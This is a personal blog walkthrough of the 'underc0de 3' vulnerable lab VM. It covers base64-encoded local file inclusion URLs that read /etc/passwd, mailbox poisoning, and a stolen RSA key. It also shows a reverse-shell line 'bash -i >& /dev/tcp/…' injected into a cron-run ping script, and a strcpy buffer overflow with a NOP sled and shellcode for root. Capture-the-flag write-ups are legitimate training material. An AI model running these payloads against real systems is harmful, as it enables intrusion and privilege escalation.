Ahmad Mahfouz

Random notes

underc0de 3 WalkThrough

loaded the virtual machine

and run netdiscover to get the machine IP

x.112 is  the target

 

so let’s see what ports available

apache is on 😀

Screen Shot 2014-12-03 at 7.07.00 AM

so let’s brute-force the directory in the server

also seems developer commented a line in the HTML code

http://192.168.1.112/ascii/letras/ folder inside
http://192.168.1.112/ascii/letras/ascii1.txt  ASCII file

index and index.html is the same

seems base64 let’s decode it

yes we have a folder called ascii too

after visit http://192.168.1.112/v.php?a=YXNjaWkxLnR4dA==

it shows ascii 404 error code

this content same content inside http://192.168.1.112/ascii/letras/ascii1.txt

so v.php do a file include for the  ascii1.txt with base64 encoded names

so let’s try to include /etc/passwd

after trying u will figure it need 4 ../ to go to /etc/passwd

that’s mean

1 letras folder 2 ascii 3 www 4 var

so it Debian family server 😀

http://192.168.1.112/v.php?a=Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

 

users with bash

root,underdist,cuervo

so let’s write an easy tool to save our time

I need to enter path name and it encodes it

then return the base64 link

and go visit it and return the content of the page

 

I need to make remote command execute from  local file include

trying to include any log files I can inject shellcode in it

I did try everything in /var/log but seems no hope

trying to brute force ssh user underdist via hydra

but it won’t work  after digging the ssh server

it only accepts RSA keys to login

so the key somewhere…..

why it installed with mailserver this is a point

let’s send some emails

mail server works as the  mail queue

and it says the user exists

mailbox can be included !!!!!!!!!!!!!!!!!!!!!!!!!

trying http://192.168.1.112/v.php?a=Li4vLi4vLi4vLi4vL3Zhci9tYWlsL3VuZGVyZGlzdA==

ERROR 500: Internal Server Error

we are in Debian server and apache2 runs via www-data ! it could have read permission

trying some email with

system , exec, shell_exec but  nothing of them works

seems all this functions disabled

trying phpinfo to get sure and it works

so lets list the dir   with some native php

 

 

 

it’s work and files listed

what this folder b_gd214dg

there is rsa privte key inside it http://192.168.1.112/b_gd214dg/foo.backup

 

sure we can use this key to login in ssh

trying to login via key

ssh -i foo.backup underdist@192.168.1.112 -vvvvvv

seems the key invalid .. : -s

trying the other users

the home directory is empty

but seems i can list the underdist user

what is new here is

cronping.py ips.txt .bin

seems i can’t access bin folder

but ips.txt is writable

lets see the python file

ips function to open ips.txt this file content list of ips

and command function it ping ips and grep txt from out put and some cut with determiner space and print 4th column

it can be hacked as it just read the file and execute it with no ip regex

example: ping -c 1 -w1 4.2.2.2;bash -i >& /dev/tcp/192.168.1.100/1337 0>&1

it should be send us a shell

lets monitor the /tmp/logs and see if  this script really run via cron

yes it run around every 10 sec

setting the malicious code after the ip

 

and wait the shell

as the only method to communicate via ssh so i added my rsa public key inside the authorized_keys

to  use  the best of bash

nice  we are in and the echo with suid

segmento amigoooooo 😀

checking if any protection before we play

seems clean nice

so the app raise overflow for the argv1

lets fire gdb

it call strcpy and this is our poor function 😀

so lets see what in the registers

nice we control the eip register

and the rest of data overflow the ebp too

 

so lets find the correct offset

 

so the crash at address 0x6b41316b

lets see what offset we are at

 

so lets prepare the payload and kill the root

304 (NOP + SHELLC0D3 ) + 4 BIT For EIP and we will be done

here is x86 shell code to execute /bin/sh shellcode size 23bit tiny one

so 304 buffer  – 23 shell code=  281 nop

so lets redo it and put a break point on strcpy

 

printing data inside esp register

 

welcome love 😀

but we still in the gdb so we have to run it outside the gdb

after i run it from a shell it says Violación de segmento

so lets do it again inside gdb

lets check the esp one more

 

NOPS everywhere

so lets  do it from gdb  again

first time i run it from shell it lead to invalid address but as we have 281 NOP so i decided to use the next NOP address

and hell yeaah

Screen Shot 2014-12-03 at 10.22.07 AM 1

 

One thought on “underc0de 3 WalkThrough

  • Br1ght D4rk
    December 4, 2014 at 7:25 pm

    wooow !! This is so Damn awesome
    keep keep (Y)

Leave a Reply

Your email address will not be published. Required fields are marked *.

*
*
You may use these <abbr title="HyperText Markup Language">HTML</abbr> tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.